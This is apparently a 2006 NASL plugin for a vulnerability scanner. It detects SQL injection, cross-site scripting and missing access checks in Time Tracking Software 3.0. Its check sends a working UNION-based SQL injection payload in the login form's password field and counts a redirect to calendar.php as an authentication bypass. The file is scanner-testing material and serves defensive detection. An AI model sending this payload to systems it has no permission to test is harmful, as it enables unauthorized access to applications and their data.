##############################################################################
#
#  Time Tracking Software Multiple Vulnerabilities 
#
#  Copyright: OS2A and it's member companies
#
#  Date Written: 2006/02/22
#
#  $Revision: 1.1 $
#
#  $Log: os2a_timetracking_multiple_vuln_601413.nasl,v $
#  Revision 1.1  2006/02/23 12:11:39  shraddha
#  To Production Issue #1934
#
#  Revision 1.3  2006/02/23 04:39:22  hshreesha
#  issue #1934
#  formatting changes
#
#  Revision 1.2  2006/02/22 08:32:03  drahul
#  issue #1934
#  script category modified
#
#  Revision 1.1  2006/02/22 07:11:32  drahul
#  issue #1934
#
#
#
#  ------------------------------------------------------------------------
#  This program was written by OS2A and/or it's member companies and is
#  licensed under the GNU GPL license. Please see below for details. This
#  header contains information regarding licensing terms under the GPL, and
#  information regarding obtaining source code from the Author. Consequently,
#  pursuant to section 3(c) of the GPL, you must accompany the information
#  found in this header with any distribution you make of this Program.
#  ------------------------------------------------------------------------
##############################################################################


if(description)
{
 script_id(601413);
 script_bugtraq_id(16731, 16630);
 script_cve_id("CVE-2006-0689", "CVE-2006-0690", "CVE-2006-0691");
 script_copyright(english:"Copyright (C) 2006 OS2A");
 script_version ("$Revision: 1.1 $");
 script_category(ACT_ATTACK);
 script_family(english:"CGI abuses");
 script_name(english:"Time Tracking Software Multiple Vulnerabilities");
 script_summary(english:"Check for Authentication Bypass Vulnerability in Time Tracking Software");
 desc["english"] = "
 Overview : This host has Time Tracking Software, which is prone to SQL injection,
 cross-site scripting and other attacks.

 Vulnerability Insight : 
 - Missing credential validation in edituser.php can be exploited to modify
   the data of any users.

 - Input passed to txtPassword field in login.php is not properly sanitized
   before being used in a SQL query.

 - Input passed to the UserName field in the Registration Form is not properly
   sanitized before being saved.

 Impact : This could allow the attacker to bypass authentication and gain
 unauthorized access to the application or add, modify, and delete information
 in the back-end database or may allow the attacker to steal the victim's
 cookie-based authentication credentials.

 Scope of impact is restricted to application level.

 Affected Software : Time Tracking Software 3.0 and prior.
		    
 Affected Platform : Any system running the affected software.

 Solution : Vendor has not yet released a patch/upgrade for this issue as
 of February 22, 2006. Information regarding this issue will be updated once
 the solution details are available.
 
 References : http://www.evuln.com/vulns/69/description.html

 CVSS Score :
	CVSS Base Score     : 7.0 (AV:R/AC:L/Au:NR/C:P/I:P/A:P/B:N)
	CVSS Temporal Score : 6.3
 Risk factor : High";

 script_description(english:desc["english"]);
 script_dependencies("http_version.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if(!port){
	exit(0);
}

dirs = make_list(cgi_dirs());
foreach dir (dirs)
{
	url = string(dir, "/login.php");
        sendRequest = http_get(item:url, port:port);
        receiveResponse = http_keepalive_send_recv(port:port, data:sendRequest,
                                                   bodyonly:1);
        if(receiveResponse == NULL){
                exit(0);
	}

 	if("css/calendar.css" >< receiveResponse && 
	   "Please enter your login details" >< receiveResponse)
	{
		postdata = raw_string("txtUserName=test&txtPassword=%27+" +
			              "union+select+1%2C2%2C3%2C4%2C5%2C6%2C" +
				      "+7%2C8%2C9%2C10%2C11%2C+12%2C13%2F*" +
				      "&submit=Login");

                sendRequest = string("POST ", dir, "/login.php HTTP/1.1\r\n",
                                     "Host: ", get_host_name(), "\r\n",
                                     "Content-Type: application/x-www-form-urlencoded\r\n",
                                     "Content-Length:", strlen(postdata), "\r\n",
                                     "\r\n",
                                     postdata);
                receiveResponse = http_keepalive_send_recv(port:port,
                                                           data:sendRequest);

                if(receiveResponse == NULL){
                        exit(0);
                }

		if(ereg(pattern:"^HTTP/.* 302 ", string:receiveResponse) &&
                   egrep(pattern:"(L|l)ocation:.*calendar.php",
                         string:receiveResponse)){
			security_hole(port);
		}
		exit(0);
	}
}